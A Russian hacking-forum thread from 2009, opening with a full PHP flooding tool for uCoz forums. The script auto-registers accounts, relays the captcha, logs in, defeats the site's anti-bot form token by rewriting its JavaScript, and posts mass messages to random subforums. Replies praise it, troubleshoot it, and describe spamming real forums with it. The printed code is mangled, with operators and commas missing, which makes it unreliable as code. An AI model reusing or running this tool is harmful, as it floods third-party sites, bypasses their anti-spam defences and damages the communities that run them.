Форумы Флудер форумов ucoz.ru

Discussion in 'Уязвимости CMS/форумов' started by Артем Солнце, 22 Jan 2009.

  1. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    PHP:
    <?php 
    #if(isset($_POST['password']) && $_POST['password']=='0123'){ 
    set_time_limit(0); 
    ob_implicit_flush (); 
    function 
    get($url$postdata$cookie$ref$h){ 
        
    $cp curl_init(); 
        
    curl_setopt ($cpCURLOPT_URL$url); 
        
    curl_setopt($cpCURLOPT_RETURNTRANSFER1);  
        if(
    $h==1) {curl_setopt($cpCURLOPT_HEADER1);} else {curl_setopt($cpCURLOPT_HEADER0);} 
        
    curl_setopt($cpCURLOPT_TIMEOUT,17);  
        if(!empty(
    $ref))curl_setopt($cpCURLOPT_REFERER$ref); 
        if(!empty(
    $cookie))curl_setopt($cpCURLOPT_COOKIE$cookie);  
        if(!empty(
    $postdata))curl_setopt($cpCURLOPT_POSTTRUE); 
        if(!empty(
    $postdata))curl_setopt($cpCURLOPT_POSTFIELDS,$postdata); 
        
    $data curl_exec ($cp); 
        
    curl_close ($cp); 
        return 
    $data;     } 
        function 
    get2($serv,$fp$url$post_data,$ref,$cookies,$t){ 
        if(!
    $fp){$fp=fsockopen($serv,80);} 
        if(!empty(
    $post_data)){$header  "POST $url HTTP/1.1\r\n";} 
        elseif(empty(
    $post_data)){$header  "GET $url HTTP/1.1\r\n";} 
        
    $header .= "Host: $serv\r\n"
        
    $header .= "Connection: Keep-Alive\r\n"
        if(!empty(
    $ref)){$header .= "Referer: http://$serv/forum/$ref-0-0-1-1\r\n";} 
        if(!empty(
    $cookies)){$header .= "Cookie: $cookies\r\n";} 
        
    $header .= "Content-Type: application/x-www-form-urlencoded\r\n"
        if(empty(
    $post_data)){$header .= "\r\n";} 
        elseif(!empty(
    $post_data)){$header .= "Content-Length: ".strlen($post_data)."\r\n\r\n"
        
    $header .= $post_data;} 
        
    fputs($fp$header); 
        if(
    $t=='full'){while(!feof($fp)){@$data .=fread($fp,900);}} 
        elseif(
    $t=='poh'){$data=fread($fp,900);} 
        return 
    $data;} 
    if(isset(
    $_GET['TEST']) && preg_match("/secure\/6-0-[0-9]{1,90}/",$_GET['TEST'])){$test=$_GET['TEST'];$data=get($test,"","","","",0);die($data);} 

    elseif(!isset(
    $_GET['TEST']) && !isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && !isset($_POST['forum']) && !isset($_POST['header']) && !isset($_POST['text'])){ 
    die(

    <Br><br><Br><BR><bR> 
    <form method=post> 
    forum(http://lala.clan.su/forum/): <br><input name=forum size=90><br> 
    <input type=submit> 
    </form> 
    "
    ); 

    elseif(isset(
    $_POST['forum']) && !isset($_GET['TEST']) && !isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && !isset($_POST['header']) && !isset($_POST['text'])) 

    $forum=$_POST['forum']; 
    $foruma=parse_url($forum); 
    $serv=$foruma['host']; 
    $data=get("http://$serv/index/3","","","",1); 
    if(
    preg_match("/src=\"(http:\/\/$serv\/secure\/6-0-[0-9]{1,90})\"/is",$data,$maq)){ 
    $img="http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."?TEST=".$maq[1]; 
    die(
    "<img src=".$img."width=70 height=70><form method=post><input name=img size=47><input type=hidden name=forum value=$forum><br><input type=submit></form>"); 
    }else die(
    'cannot find captcha'); 

    elseif(isset(
    $_POST['forum']) && !isset($_GET['TEST']) && isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && !isset($_POST['header']) && !isset($_POST['text']) && !isset($_POST['login']) && !isset($_POST['password'])) 

    $forum=$_POST['forum']; 
    $foruma=parse_url($forum); 
    $serv=$foruma['host']; 
    $login="LOGIN".rand(1,999); 
    $password="qq".rand(12,9000); 
    $post="jkd498=1&jkd428=1&user=$login&password=$password&password1=$password&name=FULL".rand(1,999)."&email=E-".rand(1,999)."[Педобот! Ссылки могут видеть только зарегистрированные пользователи. Зарегистрироваться...]&home_page=&icq=".rand(99999,99999)."&by=1975&bm=12&bd=31&gender=1&avatar=&signature=hek&code=$img&a=4&s=0"
    $url="http://$serv/index/"
    $data=get($url,$post,"","",1); 
    if(
    eregi("Неправильный код",$data)){die('wrong code ;)');} 
     die(
    "<font color=green><b>USER $login WAS SUCCESSFULLY REGISTERED</b></font><br> 
     <form method=post> 
    forum: <input name=forum value='
    $forum'><br> 
    tema:  <input name=header value='TEMA'><br> 
    text:   <textarea cols=20 rows=3 name=text>TEXT</textarea><br> 
    skoka zaprosov:    <input name=skoka value='50'><br> 
    login:     <input name=login value='
    $login'><br> 
    password:      <input name=password value='
    $password'><br> 
     <input type=submit value='Go to part #2 :D'> 
    </form> 
    "
    ); 

    elseif(!isset(
    $_GET['TEST']) && !isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && isset($_POST['forum']) && isset($_POST['header']) && isset($_POST['text']) && isset($_POST['skoka']) && isset($_POST['login']) && isset($_POST['password'])) 

    $forum=$_POST['forum']; 
    $login=$_POST['login']; 
    $password=$_POST['password']; 
    $tema=urlencode($_POST['header']); 
    $text=urlencode($_POST['text']); 
    if(isset(
    $_POST['skoka'])){(int)$skoka=$_POST['skoka'];}else $skoka=10
    $pars=parse_url($forum); 
    $serv=$pars['host']; 
    $url2=$pars["path"]; 
    $url1="http://$serv/index/"
    $data=get($url1,"user=$login&password=$password&rem=1&hidden=1&a=2&ajax=2","","",1); 
    #################################### 
    #################################### 
    echo("<b>Trying to login:</b> "); 
    if(
    preg_match("/Set-Cookie: (.*?);/is",$data,$mat)){ 
    echo(
    "<b><font color=green>SUCCESS</font></b><Br>"); 
    $cookie=($mat[1]);unset($data); 
    $data=get("http://$serv/forum/","","","",1); 
    echo(
    "<b>Searching for forums:</b> "); 
    if(
    preg_match_all("/<a class=\"forum\" href=\"http:\/\/$serv\/forum\/([0-9]{1,900})\">/",$data,$mat)){ 
    $arr=$mat[1];#die($mat[1][1]); 
    $lala=$arr[rand(0,count($arr)-1)]; 
    echo(
    "<b><font color=green>SUCCESS, found ".count($arr)." forums</font></b><br>"); 
    $test="http://".$serv."/forum/$lala-0-0-1-1";#die($test); 
    $data=get($test,"",$cookie,"",1); 
    echo(
    "<b>Trying to get \$SSID:</b> "); 
    if(
    preg_match("/\"ssid\" value=\"([0-9]{20,30})\"/",$data,$mad)) 
            { 
                
    $ssid=($mad[1]); 
                echo(
    "<b><font color=green>\$SSID FOUND!: $ssid</font></b><br>"); 
                if(
    preg_match("/<script type=\"text\/javascript\">var (.*?)\'\);<\/script>/",$data,$lolo)){ 
                
    $lolo0=$lolo[0]; 
                foreach(
    $arr as $ar){$re.="$ar,";} 
                
    $re=base64_encode($re); 
                echo(
    "<form method=post name=f1><input type=hidden name=lol value=''> 
                <input type=hidden name=forum value='
    $forum'> 
                <input type=hidden name=cookie value='"
    .urlencode(base64_encode($cookie))."'> 
                <input type=hidden name=header value='
    $tema'> 
                <input type=hidden name=text value='
    $text'> 
                <input type=hidden name=skoka value='
    $skoka'> 
                <input type=hidden name=serv value='
    $serv'> 
                <input type=hidden name=re value='
    $re'> 
                <input type=submit value='im ready ) start :D'>"
    ); 
                
    $lolo0=str_replace("return r","return document.f1.lol.value = escape(r)",$lolo0); 
                die(
    $lolo0); 
                } else die(
    "<br>CANNOT GET SPECIAL CONTENT."); 

            } else die(
    "<b><font color=red>FAILED!!!!</font></b>"); 

    } else die(
    "<b><font color=red>FAILED!!!!</font></b>"); 

    }else die(
    'wrong login/pass or cant connect'); 

    elseif(!isset(
    $_GET['TEST']) && !isset($_POST['img']) && isset($_POST['re']) && isset($_POST['skoka']) && isset($_POST['serv']) && isset($_POST['lol']) && isset($_POST['cookie']) && isset($_POST['forum']) && isset($_POST['header']) && isset($_POST['text'])){ 
    $re=base64_decode($_POST['re']); 
    $arr=explode(",",$re); 
    $serv=$_POST['serv']; 
    $lol=urldecode($_POST['lol']); 
    $skoka=$_POST['skoka']; 
    $cookie=$_POST['cookie']; 
    $cookie=urldecode($cookie); 
    $cookie=base64_decode($cookie); 
    $tema=$_POST['header']; 
    $text=$_POST['text']; 
    $lala=$arr[rand(0,count($arr)-2)]; 
    if(
    preg_match("/name=\"([a-z0-9]{1,90})\" value=\"([0-9]{1,90})\" \/>/",$lol,$mat)){ 
    $key1=$mat[1]; 
    $value1=$mat[2]; 
                
    $fp=fsockopen($serv,80); 
    if(!
    $fp){$fp=fsockopen($serv,80);} 
                if(
    $fp){ 
    if(!
    $fp){$fp=fsockopen($serv,80);} 
                echo(
    "<h1>STARTING Fl00d</h1><br>"); 
                
    $count=0
                for(
    $i=0;$i<$skoka;$i++) 
                { 
                
    $lala=$arr[rand(0,count($arr)-2)]; 
                
    $post_data="jkd498=1&jkd428=1&name=$tema&description=&fsize=0&ffont=0&fcolor=0&tagcount=0&message=$text&smiles_on=1&signature_on=1&syst=&ssid=$ssid&fid=$lala&tid=0&p=0&a=4&$key1=$value1"
                
    $data=null;#die($data."<br><br><br><br>$post_data"); 
                
    unset($data); 
                
    $urla="/forum/"
                if(!
    $fp){$fp=fsockopen($serv,80);} 
                
    $data=get2($serv,$fp,$urla,$post_data,$lala,$cookie,'poh'); 
                if(
    eregi("302 Found",$data)){$count++;} 
                } 
                
    fclose($fp); 
                die(
    '<script>alert("DONE! You have sended '.$count.' messages");</script>'); 
                } 
    } else die(
    "Cannot calculate special content. Please report."); 

    else die(
    666); 
    #} else die('u dont have access.'); 
    ?> 
    (с) http://narod.ru/disk/3865900000/ucoz.php.html
     
    1 person likes this.
  2. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    177
    Likes Received:
    134
    Reputations:
    6
    протестим
     
  3. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    ПС, с какого времени на форумах укоза не стоит антифлуд?
     
  4. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,073
    Likes Received:
    642
    Reputations:
    87
    ого)) ну спасибо большое))
    не проюзал ещё.. но думю работает..
    помню мой знакомый писал регалку и флудер для юкозовских сайтов... но это было давно.. и не пашут они...
    + тыкнул ;)
     
  5. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    имхо копирайт не мой, действую по принципу.: Нашел = Поделился
     
  6. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Но по любому спасибо и + за старания
     
  7. alx8787

    alx8787 Elder - Старейшина

    Joined:
    16 Dec 2007
    Messages:
    47
    Likes Received:
    6
    Reputations:
    -12
    А кто вообще тестил??? А то была у мну 1 прожка, но та полуавтоматом работала... ну типа время только правильно отсчитывала....
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Это называется копи-паст (Скопировал-Вставил).
     
  9. LenarVS

    LenarVS Elder - Старейшина

    Joined:
    5 Jun 2008
    Messages:
    28
    Likes Received:
    2
    Reputations:
    0
    Если правильно выставить таймаут,то можно довольно неплохо зафлудит форум.Поставил +,но лучше б рабочий аналог на перле.Было б лучше чем пхп.Хотя кому как...
     
  10. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    269
    Likes Received:
    179
    Reputations:
    4
    скрипт полностью рабочий,единственный трабл, это надо самому зарегить юзера.ато авторега неробит
     
  11. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    939
    Likes Received:
    162
    Reputations:
    27
    Такие скрипты нету смысла использовать и писать: в админа есть опция удалить записи пользователя. В 2 клика можно удалить все сообщения любого пользователя, сколько их бы не было.
     
  12. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    269
    Likes Received:
    179
    Reputations:
    4
    нифига подобного,я заспааамил 16 популярных укоз форумов,и ничига,всё вручную удаляли,
    не все ведь админы такие умные, скрипт норм,я вот думаю если изменить запросы,адреса на создание тм,то мона его и под флудер для vbulletin переделать
     
  13. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Parse error: syntax error, unexpected T_STRING in .../da.php on line 163

    Как исправить это?
     
    1 person likes this.
  14. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    628
    Likes Received:
    283
    Reputations:
    17
    пробелы подотри
    по сабжу: я до сих пор юзаю старый добрый инеткряк от античата))
     
  15. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    инеткряк это этот чтоли? если нет то поделись)

    Эмм... НЕ пойму, пишет SPAM доне и отправлено 0 месаг..
     
  16. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Люди, это НЕЧТО ! :D Поставил миллион запросов, так он мне пол часа висел, и потом выдал что готово, ппц, посмотрел на форум там весь форум зосран :D С меня огромные плюсы :D
     
    1 person likes this.
  17. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Подскажите хостинг который поддерживает это.. Пожалуйста... на двух уже пробовал, файлед.. Только вот на 1.. и то друга
     
  18. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    194
    Reputations:
    0
    Было бы круто, если бы скрипт сам подставлял акки и слал определённое колличество флуда с одного аккаунта.

    Так уж и быть, акки можно нарегать и ручками :)

    А так, чистится сайт элементарно. Но насрать можно порядочно
     
  19. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Вроде уже не работает спамер, люди помогите - проверьте у себя если работает... С мну +.

    У мну пишет что не может найти список форумов ( FAILED )

    Проверял на многих форумах. Скрипт поставил на сервере...
     
  20. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Trying to login: SUCCESS
    Searching for forums: SUCCESS, found 12 forums
    Trying to get $SSID: FAILED!!!!

    Скрипт больше не робит?:(
     
Loading...